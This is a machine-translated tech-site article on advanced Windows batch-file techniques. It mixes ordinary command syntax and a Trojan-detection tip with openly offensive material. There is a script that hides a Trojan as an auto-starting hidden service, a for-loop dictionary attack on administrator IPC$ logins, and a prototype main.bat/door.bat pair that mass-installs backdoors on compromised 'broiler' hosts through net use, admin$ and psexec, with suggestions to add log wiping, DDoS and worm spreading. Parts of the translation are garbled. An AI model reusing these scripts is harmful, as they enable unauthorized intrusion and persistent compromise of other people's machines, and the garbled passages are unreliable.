Network Security Internet Technology Development Database Servers Mobile Phone Android Software Apple Software Computer Software News IT Information

In addition to Weibo, there is also WeChat

Please pay attention

WeChat public account

Shulou

What are the advanced skills of batch processing

2025-01-19 Update From: SLTechnology News&Howtos shulou NAV: SLTechnology News&Howtos > Development >

Share

Shulou(Shulou.com)06/03 Report--

This article mainly shows you "what are the advanced application skills of batch processing". The content is easy to understand and clear, hoping to help you solve your doubts. Let me lead you to study and learn the article "what are the advanced application skills of batch processing".

Advanced use of batch processing 1

one。 Simple batch internal commands

Advanced use of batch processing! A little trick!

Batch processing is familiar to everyone!

Here are a few knowledge points about batch processing:

1: skillfully use the FC command to check Trojans:

First create the batch file atm.bat: write code: @ echo off

Dir c:\ windows\ system32\ * .exe > c:??.txt

Dir c:\ windows\ system32\ * .dll > c:??.txt

2: create batch file WLTS.bat write code: @ echo off

Dir c:\ windows\ system32\ * .dll > c:\ findexe.txt

Dir c:\ windows\ system32\ * .exe > c:\ finddll.txt

Fc c:??.txt c:\ findexe.txt > c:\ exe.txt

Fc c:??.txt c:\ finddll.txt > c:\ dll.txt

So run ATM.BAT on your machine first.

In the future, when you suspect a Trojan horse, run WLTS.BAT and then take a look at C:\ EXE.TXT and DLL.TXT to see the suspicious file! This is just a train of thought! You can also use him to know the junk files left when you uninstall the software! Like in the registry!

2: use the SUBST command to make a hard drive!

Example

Subst x: c:??

Where X is the drive letter 111 is the folder where the drive is created

3: skillfully use the SUBST command to hide 3.5 drives

Subst h: C:\ atm and make the ATM folder read-only!

Restore: at start-run-subst a: / d!

1.Echo command

Turn on or off the request echo feature, or display messages. If there are no parameters, the echo command displays the current echo settings.

Grammar

Echo [{on | off}] [message]

Sample:@echo off / echo hello world

In practical application, we will combine this command with redirection symbols (also known as pipe symbols, usually use > > ^) to input some commands into files of a specific format. This will be reflected in future examples.

2.@ command

Indicates that the commands after @ are not displayed, so during the invasion (such as using batch processing to format the enemy's hard drive), you will not be able to let the other party see the commands you are using.

Sample:@echo off

@ echo Now initializing the program,please wait a minite...

@ format X: / q/u/autoset (the / y parameter is not allowed in the format command, but the good news is that Microsoft left an autoset parameter for us, and the effect is the same as / y.)

3.Goto command

Specify to jump to the label, and when the tag is found, the program will process the command that starts on the next line.

Syntax: goto label (label is a parameter that specifies the lines in the batch program to be directed to. )

Sample:

If {% 1} = = {} goto noparms

If {% 2} = {} goto noparms (if you don't understand the if,% 1,% 2 here, skip it first, and there will be a detailed explanation later. )

@ Rem check parameters if null show usage

: noparms

Echo Usage: monitor.bat ServerIP PortNumber

Goto end

The name of the tag can be chosen at will, but it is better to have a meaningful letter, preceded by a letter: to indicate that the letter is a label, and the goto command is based on this: to find the next step to jump there. You'd better have some instructions so that you and others will seem to understand your intentions.

4.Rem command

The comment command, which is equivalent to / *-/ in the C language, is not executed, but acts as a comment for others to read and you to modify later.

Rem Message

Sample:@Rem Here is the description.

5.Pause command

When you run the Pause command, the following message is displayed:

Press any key to continue. . .

Sample:

@ echo off

: begin

Copy aRom back. * d:\

Echo Please put a new disk into driver A

Pause

Goto begin

In this example, all files on disk in drive An are copied to d:\ back. When the comment that appears prompts you to put another disk in drive A, the pause command suspends the program so that you can replace the disk and press any key to continue processing.

6.Call command

Calls from one batch program to another without terminating the parent batch program. The call command accepts the label that is used as the target of the call. If you use Call outside of a script or batch file, it will not work on the command line.

Grammar

Call [[Drive:] [Path] FileName [BatchParameters]] [: label [arguments]]

Parameters.

[Drive:} [Path] FileName

Specifies the location and name of the batch program to be called. The filename parameter must have a .bat or .cmd extension.

7.start command

Call external programs, all DOS commands and command-line programs can be called by the start command.

Common parameters of intrusion:

Window minimization at the beginning of MIN

SEPARATE starts a 16-bit Windows program in a separate space

HIGH starts the application in the HIGH priority category

REALTIME starts the application in the REALTIME priority category

WAIT starts the application and waits for it to finish

Parameters these are the parameters passed to the command / program

When the executing application is a 32-bit GUI application, CMD.EXE returns a command prompt without waiting for the application to terminate. If executed within a command script, the new behavior does not occur.

8.choice command

Choice uses this command to allow the user to enter a character to run different commands. The / c: parameter should be added when in use, and the characters that can be prompted for input should be written after c:, with no space between them. Its return code is 1234...

Such as: choice / cme defrag,mem,end

Will be displayed

Defrag,mem,end [D,M,E]?

Sample:

The Sample.bat is as follows:

@ echo off

Choice / cme defrag,mem,end

If errorlevel 3 goto defrag (the error code with the highest value should be judged first)

If errorlevel 2 goto mem

If errotlevel 1 goto end

Efrag

C:\ dos\ defrag

Goto end

: mem

Mem

Goto end

: end

Echo good bye

After this file is run, it will display defrag,mem,end [DJI MJE]? The user can select d me, and then the if statement will make a judgment. D means to execute the program segment labeled defrag, m means to execute the program segment labeled mem, e means to execute the program segment labeled end, and each program segment finally jumps the program to the end label with goto end, and then the program will display good bye and the file will end.

Advanced use of batch processing 2

three。 How to use combined commands (Compound Command)

1. &

Usage: first command & second command [& third command.]

In this way, multiple commands can be executed at the same time, regardless of whether the command is successful or not

Sample:

C:\ > dir z: & dir c:\ Ex4rch

The system cannot find the path specified.

Volume in drive C has no label.

Volume Serial Number is 0078-59FB

Directory of c:\ Ex4rch

2002 05 14 23:51

2002-05-14 23:51.

2002-05-14 23:51 14 sometips.gif

2. Please &

Usage: first command & & second command [& & third command.]

In this way, multiple commands can be executed at the same time. When there is an error in the execution of the command, the subsequent command will not be executed, and all the commands will be executed all the time if there has been no error.

Sample:

C:\ > dir z: & & dir c:\ Ex4rch

The system cannot find the path specified.

C:\ > dir c:\ Ex4rch & & dir z:

Volume in drive C has no label.

Volume Serial Number is 0078-59FB

Directory of c:\ Ex4rch

2002 05 14 23:55

2002-05-14 23:55.

2002-05-14 23:55 14 sometips.gif

1 File (s) 14 bytes

2 Dir (s) 768671744 bytes free

The system cannot find the path specified.

It may be easier to use this command when making a backup, such as:

Dir file://192.168.0.1/database/backup.mdb & & copy file://192.168.0.1/database/backup.mdb E:\ backup

If the backup.mdb file exists on the remote server, the copy command is executed, and if the file does not exist, the copy command is not executed. This usage can replace IF exist:) 3. | |

Usage: first command | | second command [| | third command.]

In this way, multiple commands can be executed at the same time. When the correct command is executed, the subsequent command will not be executed, and if no correct command appears, all the commands will be executed all the time.

Sample:

C:\ Ex4rch > dir sometips.gif | | del sometips.gif

Volume in drive C has no label.

Volume Serial Number is 0078-59FB

Directory of C:\ Ex4rch

2002-05-14 23:55 14 sometips.gif

1 File (s) 14 bytes

0 Dir (s) 768696320 bytes free

Examples of the use of combined commands:

Sample:

@ copy trojan.exe\ 1\ admin$\ system32 & & if not errorlevel 1 echo IP 1 USER 2 PASS 3 > > victim.txt

No.4

Fourth, the use of pipeline commands

1. | Command

Usage: first command | second command [| third command.]

Use the result of the first command as an argument to the second command, which is common in unix.

Sample:

Time / t > > D:\ IP.log

Netstat-n-p tcp | find ": 3389" > > D:\ IP.log

Start Explorer

Can you see that? Terminal Services allows us to customize the starting program for the user to run the following bat to get the IP of the logged-in user.

2. > output redirect command

The difference between redirecting a command or the output of a program to a specific file is that > clears the contents of the original file and writes to the specified file, while > > only appends the contents to the specified file. without changing the contents.

Sample1:

Echo hello world > c:\ hello.txt (stupid example?)

Sample2:

Nowadays, DLL Trojans are very popular. We know that system32 is a good place to play hide-and-seek. Many Trojans have sharpened their heads to drill there, and DLL horses are no exception. We can make a record of the EXE and DLL files in this directory after installing the system and necessary applications:

Run CMD-- to convert the directory to system32--dir * .exe > exeback.txt & dir * .dll > dllback.txt

So that the names of all EXE and DLL files are recorded in exeback.txt and dllback.txt, respectively.

In the future, if an anomaly is found but the problem cannot be found by the traditional method, it is necessary to consider whether the DLL Trojan has been sneaked into the system.

Then we use the same command to record the EXE and DLL files under system32 to other exeback1.txt and dllback1.txt, and then run:

CMD--fc exeback.txt exeback1.txt > diff.txt & fc dllback.txt dllback1.txt > diff.txt. (use the FC command to compare the DLL and EXE files before and after two times, and enter the results into diff.txt), so that we can find some extra DLL and EXE files, and then by looking at the creation time, version, whether it has been compressed, etc., we can easily determine whether it has been patronized by the DLL Trojan. No is the best, if there is, do not directly DEL off, first use regsvr32 / u trojan.dll to cancel the backdoor DLL file, and then move it to the Recycle Bin, if there is no abnormal reflection of the system, then delete it completely or submit it to the antivirus software company.

3.

< 、>

&, & writes the output of one handle to the input of another.

> Sample.reg

@ echo [HKEY_LOCAL_MACHINE\ SOFTWARE\ Microsoft\ Windows\ CurrentVersion\ Run] > Sample.reg

@ echo "Invader" = "Ex4rch" > > Sample.reg

Echo "door" = 5 > > C:\\ WINNT\\ system32\\ door.exe > > Sample.reg

@ echo "Autodos" = dword:02 > > Sample.reg

Samlpe2:

When we use some older Trojans, we may generate a key under [HKEY_LOCAL_MACHINE\ SOFTWARE\ Microsoft\ Windows\ CurrentVersion\ Run (Runonce, Runservices, Runexec)] in the registry to realize the self-startup of Trojans. However, it is easy to expose the path of the Trojan program, resulting in the Trojan being checked and killed. relatively, it is relatively safe to register the Trojan program as a system service. Take the configured IRC Trojan DSNX as an example (named windrv32.exe)

@ start windrv32.exe

@ attrib + h + r windrv32.exe

@ echo [HKEY_LOCAL_MACHINE\ SOFTWARE\ Microsoft\ Windows\ CurrentVersion\ Run] > patch.dll

@ echo "windsnx" =-> > patch.dll

@ sc.exe create Windriversrv type= kernel start= auto displayname= WindowsDriver binpath= c:\ winnt\ system32\ windrv32.exe

@ regedit / s patch.dll

@ delete patch.dll

REM [delete the startup key of DSNXDE in the registry, register it as a system critical service with sc.exe and set its properties to hidden and read-only, and config to self-startup]

@ REM, this is not safer ^ _ ^.

Some good skills! (it can be called a classic)

1. If you have multiple windows open at the same time and want to close, hold down shift and click the close icon in the upper right corner of the window.

two。 Before saving the web page, you can press the "ESC" key (or work offline) and save it again, so that you can save it quickly.

3. Listen to CD on the computer without any playback software, connect the speaker cable directly to the headphone hole of the CD-ROM drive, put it into the CD, and press the play key on the CD-ROM drive to listen directly, so that listening to music does not take up system resources. If your computer is broken and cannot be started or something, it can't be repaired for a while. Don't waste resources. If you use the power supply inside to power up the CD drive, you can temporarily make a CD player.

Press enter when sending messages in 4.MSN. If you want to change lines but do not want to send messages, you can shift+enter or ctrl+enter

5. Short HTML code can be debugged in the browser's address bar. The method is as follows: write about: abc enter in the address bar, and you will see the effect.

6.Windows shortcut key:

Win+m display Desktop

Win+pause system Properties

Quick restart: press shift before pressing OK (not applicable to 2k, xp).

Completely delete hift+del

Do not let the CD run automatically: press shift

Ctrl+Esc: equivalent to "start" or win key

Ctrl+Home: move the cursor to the beginning of the text editing area (Home only: move to the beginning of the column)

Ctrl+End: move the cursor to the end of the text editing area (End: move to the end of the column)

Alt+F4: close the current window (shutdown if you click on the desktop and then press it)

F2: change the name

Windows+e Explorer.

Windows+r runs.

Windows+f search.

Windows+u shuts down the system.

Windows+d minimizes all windows, press Win+D again to return to the window before minimization.

Windows+m minimizes all windows, but pressing again cannot return to the window before minimization.

Shift+F10, you can open the right-click menu of the selected project.

CTRL+SHIFT-drag file: create a shortcut.

7. Shortcut to shutdown

(1)。 Press the right mouse button in the blank position of the desktop->-> Select

(2)。 Before typing rundll.exe user.exe,exitwindows

(3)。 Before typing or the name you want-> press

8. Restart the shortcut

(1)。 Repeat above (1)

(2)。 Before typing rundll.exe user.exe,exitwindow***ec

(3)。 Before typing or the name you want-> press

< 完成>

9.RUN-> cmd or command

You will see the DOS window. I don't know if you've noticed that little icon, it's in the upper left corner.

Click on this icon, you will see the drop-down menu, especially some functions under Edit, which is very convenient.

10.con and nul are reserved names of MS systems, and they cannot be used as file names! Check whether your web space is an M$ system, and try to create a con folder.

11. Want to make a list of files in one of your folders? What software do you use? No, type "tree / f > index.txt" directly at the command line. Open index.txt to see if it is clear at a glance.

twelve。 To save the borderless window page, please use CTRL+N to open a new window

Advanced use of batch processing 3

9.If command

If said it would determine whether the specified conditions were met and then decide to execute different orders. There are three formats:

1. If "parameter" = = "string" command to be executed

If the parameter is equal to the specified string, the condition holds, run the command, otherwise run the next sentence. (note that there are two equal signs)

For example, if "% 1" = "a" format a:

If {% 1} = = {} goto noparms

If {% 2} = = {} goto noparms

2. If exist file name command to be executed

If there is a specified file, the condition is established, run the command, otherwise run the next sentence.

Such as if exist config.sys edit config.sys

3. If errorlevel / if not errorlevel digital commands to be executed

If the return code is equal to the specified number, the condition holds, run the command, otherwise run the next sentence.

Such as if errorlevel 2 goto x2

When the DOS program runs, it will return a number to DOS, which is called error code errorlevel or return code. The common return codes are 0,1. 10.for command

The for command is a complex command, which is mainly used for parameters to cycle through the command within a specified range.

Use% variable to specify variables when using the FOR command in a batch file

For {% variable |% variable} in (set) do command [CommandLineOptions]

% variable specifies a parameter that can be replaced by a single letter.

(set) specify a file or group of files. You can use wildcards.

Command specifies the commands to be executed on each file.

Command-parameters specifies parameters or command line switches for specific commands.

Use% variable to specify variables when using the FOR command in a batch file

Instead of using% variable. Variable names are case-sensitive, so% I is different from% I

If the command extension is enabled, the following additional FOR command formats are subject to

Support:

FOR / D% variable IN (set) DO command [command-parameters]

If the set contains wildcards, specify to match the directory name, not the file

The first name matches.

FOR / R [[drive:] path]% variable IN (set) DO command [command-

Check the directory tree rooted in [drive:] path and point to the

FOR statement. If no directory is specified after / R, the current

Catalogue. If the set is only a single point (.) Character, the directory tree is enumerated.

FOR / L% variable IN (start,step,end) DO command [command-para

This set represents a sequence of numbers from beginning to end in increments.

Therefore, the sequence 1, 2, 3, 4, 5, 1, 2, 3, 4, 5, 5, 5, 4, 4, 5, 5, 5, 4, 4, 5, 5, 5, 5, 4, 4, 5, 5, 5, 4, 4, 5, 5, 4, 4, 5, 5, 5, 5, 5, 5, 5, 5, 4, 4, 5, 5, 5, 5, 5, 5, 4, 4, 4, 4, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 4, 4, 4, 4, 4, 5, 1, 4, 4, 4, 4, 5, 5, 4, 4, 4, 5, 5, 4, 4, 4, 5, 5, 4, 4, 4, 5, 1, 4,

Sequence (5-4-3-21).

FOR / F ["options"]% variable IN (file-set) DO command

FOR / F ["options"]% variable IN ("string") DO command

FOR / F ["options"]% variable IN (command) DO command

Or, if you have the usebackq option:

FOR / F ["options"]% variable IN (file-set) DO command

FOR / F ["options"]% variable IN ("string") DO command

FOR / F ["options"]% variable IN (command) DO command

Filenameset is one or more file names. Continue to the filenameset

Before the next file, each file has been opened, read, and processed.

Processing involves reading the file, dividing it into lines of text, and then dividing each line

Parse to zero or more symbols. Then use the value of the symbol string variable found

Call the For loop. By default, / F is separated by each line of each file

The first blank symbol of the Skip the blank line. You can specify the optional "options"

Parameter instead of the default parsing *. This quoted string consists of one or more

Specify keywords for different parsing options. These keywords are:

Eol=c-refers to the end of a line comment character (just one)

Skip=n-refers to the number of lines ignored at the beginning of the file.

Delims=xxx-refers to the delimiter set. This replaces spaces and tabs

Default delimiter set.

Tokens=x,y,m-n-refers to which symbol of each line is passed to each iteration

The for itself. This results in an additional variable name

The format is a range. Specify m by nth symbol

The last character in a symbol string, an asterisk.

Then the extra variable will be parsed in the last symbol.

Assign and accept reserved text for lines.

Usebackq-specifies that the new syntax has been used in the following class cases:

A string in quotation marks is executed as a command and

The quotation mark character is a text string command and is allowed in fi

Use double quotation marks to expand the file name in.

Sample1:

FOR / F "eol=; tokens=2,3* delims=," I in (myfile.txt) do command

Parses every line in the myfile.txt, ignores those that start with a semicolon, and sets the

The second and third symbols in each line are passed to the body of the for program; use commas and / or

Space delimiting symbol. Note that the statement in the body of this for program refers to% I

Get the second symbol, reference% j to get the third symbol, reference% k

To get all the remaining symbols after the third symbol. For files with spaces

Name, you need to enclose the file name in double quotes. In order to make in this way

With double quotes, you also need to use the usebackq option, otherwise, double quotes will

Is understood to be used to define a string to parse.

% I is specified specifically in the for statement,% j and% k are specified through the

The tokens= option is specifically explained. You can go through the tokens= line

Specify a maximum of 26 symbols, as long as you do not attempt to indicate a higher than the letter z or

The variable of Z. Remember, FOR variables are single-letter, case-sensitive, and global

At the same time, there cannot be more than 52 in use.

You can also use FOR / F parsing logic on adjacent strings by

Enclose the filenameset between parentheses in single quotation marks. This way, the character

The string is treated as a single input line in a file.

Finally, you can analyze the output of the command with the FOR / F command. The way is to set the

The filenameset between the parentheses becomes an anti-parenthesis string. The string will

Is treated as a command line, passed to a child CMD.EXE, and its output is caught in the

Memory and is analyzed as a file. Therefore, the following examples:

FOR / F "usebackq delims=="% I IN (`set`) DO @ echo% I

Enumerates the environment variable names in the current environment.

In addition, the replacement of FOR variable references has been enhanced. You can now use the following

Option syntax:

~ I-remove any quotation marks ("), expand% I

% ~ fI-extends% I to a fully qualified pathname

% ~ dI-expand% I to only one drive letter

% ~ pI-extends% I to only one path

% ~ nI-extends% I to only one file name

% ~ xI-extends% I to only one file extension

% ~ sI-the extended path contains only short names

% ~ aI-extends% I to the file attributes of the file

% ~ tI-extends% I to the date / time of the file

% ~ zI-extends% I to the size of the file

% ~ $PATH:I-find the directory listed in the path environment variable and extend% I

To the first fully qualified name found. If the environment variable

If the file is not defined or the file is not found, this key combination expands

Empty string

You can combine modifiers to get multiple results:

% ~ dpI-extends% I to only one drive letter and path

% ~ nxI-extends% I only to a file name and extension

% ~ fsI-only extends% I to a full pathname with a short name

% ~ dp$PATH:i-find the directory listed in the path environment variable and extend% I

To the first drive letter and path found.

% ~ ftzaI-extends% I to DIR with similar output lines

In the above example,% I and PATH can be replaced with other valid values. % ~ Grammar

Terminate with a valid FOR variable name. Select an uppercase variable name similar to% I

It is easier to read and avoid confusion with key combinations regardless of case.

The above is the official help of MS. Let's give a few examples to illustrate the use of the For command in an intrusion.

Sample2:

Use the For command to crack the brute force password of a target Win2k host.

We use net use\ ip\ ipc$ "password" / u: "administrator" to try to connect to the target host, and write down the password when successful.

The main command is one: for / fi% in (dict.txt) do net use\\ ip\ ipc$ "I%" / u: "administrator"

The password of admin is represented by I%. In dict.txt, the value of I% is connected with the net use command. Then pass the running result of the program to the find command--

For / fi%% in (dict.txt) do net use\\ ip\ ipc$ "I%%" / u: "administrator" | find ": command completed successfully" > > D:\ ok.txt, so ko.

Sample3:

Have you ever had a lot of broilers waiting for you to plant backdoor + Trojans? When the number is very large, the originally very happy thing will become very depressed. The article begins with the use of batch files, which can simplify day-to-day or repetitive tasks. So how to achieve it? Ha ha, you will understand if you look at it.

There is only one main command: (when using the FOR command in a batch file, the specified variable uses% variable)

@ for / f "tokens=1,2,3 delims=" I in (victim.txt) do start call door.bat I j k

For the use of tokens, see sample1 above, where it means that the contents of victim.txt are passed sequentially to the parameter% I% j% k in door.bat.

And cultivate.bat is nothing more than using the net use command to establish an IPC$ connection, and copy Trojan + backdoor to victim, and then use the return code (If errorlever =) to screen the host that has successfully planted the backdoor, and echo it out, or echo to the specified file.

Delims= indicates that the content in the vivtim.txt is separated by a space. I want to see here, you must also understand what the content of this victim.txt is like. It should be arranged according to the objects represented by% I% j% k, which is usually ip password username.

Prototype code:

-cut here then save as a batchfile (I call it main.bat)-

@ echo off

@ if "% 1" = "" goto usage

@ for / f "tokens=1,2,3 delims=" I in (victim.txt) do start call IPChack.bat I j k

@ goto end

: usage

@ echo run this batch in dos modle.or just double-click it.

: end

-cut here then save as a batchfile (I call it main.bat)-

-cut here then save as a batchfile (I call it door.bat)-

@ net use\% 1\ ipc$% 3 / u: "% 2"

@ if errorlevel 1 goto failed

@ echo Trying to establish the IPC$ connection. OK

@ copy windrv32.exe\ 1\ admin$\ system32 & & if not errorlevel 1 echo IP 1 USER 2 PWD 3 > > ko.txt

@ psexec\% 1 c:\ winnt\ system32\ windrv32.exe

@ psexec\ 1 net start windrv32 & & if not errorlevel 1 echo 1 Backdoored > > ko.txt

: failed

@ echo Sorry can not connected to the victim.

-cut here then save as a batchfile (I call it door.bat)-

This is just a prototype of automatic backdoor batch processing, two batches and backdoor programs (Windrv32.exe), PSexec.exe needs to be placed in a unified directory. Batch processing content

It can also be extended, such as adding the function of clearing log + DDOS, adding the function of adding users regularly, and going deeper to make it have the function of automatic propagation (worm). There is no more description here. Interested friends can study it on their own.

-

2:No.2

two。 How to use parameters in batch files

Parameters can be used in batch processing, generally from 1% to 9%. When there are multiple parameters, you need to use shift to move them. This is rare, so we will not consider it.

Sample1:fomat.bat

@ echo off

If "% 1" = = "a" format a:

: format

@ format a:/q/u/auotset

@ echo please insert another disk to driver A.

@ pause

@ goto fomat

This example is used to format several floppy disks continuously, so when you use it, you need to type fomat.bat an in the dos window. Hehe, it seems to be a little superfluous.

Sample2:

When we want to set up an IPC$ connection, we always have to enter a long list of commands, which may lead to a wrong number, so we might as well write some fixed commands into a batch and assign the broiler ip password username as parameters to the batch, so that we don't have to type commands every time.

@ echo off

@ net use\ percent\ ipc$ "2%" / u: "3%" Note, here PASSWORD is the second parameter.

@ if errorlevel 1 echo connection failed

The above is all the contents of this article entitled "what are the Advanced skills of batch processing?" Thank you for reading! I believe we all have a certain understanding, hope to share the content to help you, if you want to learn more knowledge, welcome to follow the industry information channel!

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.

Views: 0

*The comments in the above article only represent the author's personal views and do not represent the views and positions of this website. If you have more insights, please feel free to contribute and share.

Share To

Development

Wechat

© 2024 shulou.com SLNews company. All rights reserved.

12
Report